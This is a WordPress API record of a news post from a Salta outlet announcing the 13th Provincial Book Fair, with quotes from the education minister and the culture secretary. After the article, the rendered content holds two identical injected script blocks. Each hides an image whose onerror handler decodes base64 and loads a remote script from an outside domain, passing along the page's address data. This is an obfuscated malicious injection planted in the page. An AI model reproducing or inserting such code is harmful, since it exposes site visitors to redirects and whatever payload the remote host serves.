{"id":3227,"date":"2023-10-27T13:09:39","date_gmt":"2023-10-27T16:09:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3227"},"modified":"2025-08-14T00:06:31","modified_gmt":"2025-08-14T03:06:31","slug":"se-realizo-la-presentacion-de-la-xiii-feria-provincial-del-libro","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3227","title":{"rendered":"Se realiz\u00f3 la presentaci\u00f3n de la XIII Feria Provincial del Libro"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#83073f\"><em>El evento anual que re\u00fane a escritores, editoriales y lectores se realizar\u00e1 del 1 al 5 de noviembre en la Usina Cultural, contar\u00e1 con la participaci\u00f3n de siete provincias y la presentaci\u00f3n de m\u00e1s de 150 t\u00edtulos. Complementan el ciclo de literatura unas 250 actividades que se realizar\u00e1 con entrada libre y gratuita en Espa\u00f1a 198.<\/em><\/h4>\n\n\n\n<p>En el marco de la presentaci\u00f3n de la XIII edici\u00f3n de la Feria Provincial del Libro, el ministro de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda, Mat\u00edas C\u00e1nepa, manifest\u00f3 que \u00abla Feria del Libro refleja una pol\u00edtica cultural de Estado que involucra al sector literario en Salta y la pluralidad de actores que lo componen. Tambi\u00e9n permite ampliar la participaci\u00f3n y el acceso a la literatura del NOA a los salte\u00f1os y le brinda la posibilidad de conocer y compartir, a trav\u00e9s de la literatura, nuestra cultura, novelas, poes\u00eda, biograf\u00edas que abren posibilidades infinitas para el desarrollo integral de las personas\u00bb.&nbsp;<\/p>\n\n\n\n<p>Asimismo, inform\u00f3 que durante la presente edici\u00f3n \u00abse articularon diversas actividades para facilitar la participaci\u00f3n de las instituciones educativas, promoviendo la vinculaci\u00f3n de las personas con el libro y la literatura de nuestra tierra\u00bb.&nbsp;<\/p>\n\n\n\n<p>El secretario de Cultura, Diego Ashur M\u00e1s, indic\u00f3 que \u00abla Feria del Libro comprende m\u00e1s de 50 editoriales de Salta, el NOA, de Santa Fe, C\u00f3rdoba y Buenos Aires; y 250 actividades de diversa \u00edndole como presentaciones de libros, charlas de escritores, editores, danza, proyecci\u00f3n de audiovisuales e intervenciones art\u00edsticas para acercar la literatura a los distintos lectores de la provincia\u00bb. Finalmente agreg\u00f3: \u00abQueremos tambi\u00e9n agradecer a las universidades, los gremios y los municipios que decidieron formar parte de esta edici\u00f3n; como as\u00ed tambi\u00e9n anunciar la realizaci\u00f3n del primer festival internacional de Poes\u00eda, iniciativa de Teuco Castilla y Marcelo Sutti que contar\u00e1 con autores locales e internacionales del g\u00e9nero\u00bb.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9569-se-realizo-la-presentacion-de-la-xiii-feria-provincial-del-libro.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9569-se-realizo-la-presentacion-de-la-xiii-feria-provincial-del-libro.jpg\" alt=\"Se realiz\u00f3 la presentaci\u00f3n de la XIII Feria Provincial del Libro\" width=\"313\" height=\"176\"\/><\/a><\/figure><\/div>\n\n\n<p>Del 1 al 5 de noviembre en la Usina Cultural, Espa\u00f1a 1-98, se llevar\u00e1 a cabo la XIII Edici\u00f3n la Feria que ya forma parte del calendario cultural de la Provincia, articular\u00e1 250 actividades junto a editoriales gremiales, universitarias y pertenecientes a los municipios de la Provincia de Salta.&nbsp;<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n y el detalle de las actividades a partir del 1 de noviembre ingresa a\u00a0<a href=\"https:\/\/culturasalta.gov.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/culturasalta.gov.ar<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El evento anual que re\u00fane a escritores, editoriales y lectores se realizar\u00e1 del 1 al 5 de noviembre en la Usina Cultural, contar\u00e1 con la participaci\u00f3n de siete provincias y la presentaci\u00f3n de m\u00e1s de 150 t\u00edtulos. Complementan el ciclo de literatura unas 250 actividades que se realizar\u00e1 con entrada libre y gratuita en Espa\u00f1a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3228,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,11],"tags":[],"class_list":{"0":"post-3227","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3227"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3227"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3227\/revisions"}],"predecessor-version":[{"id":6936,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3227\/revisions\/6936"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3228"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3227"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}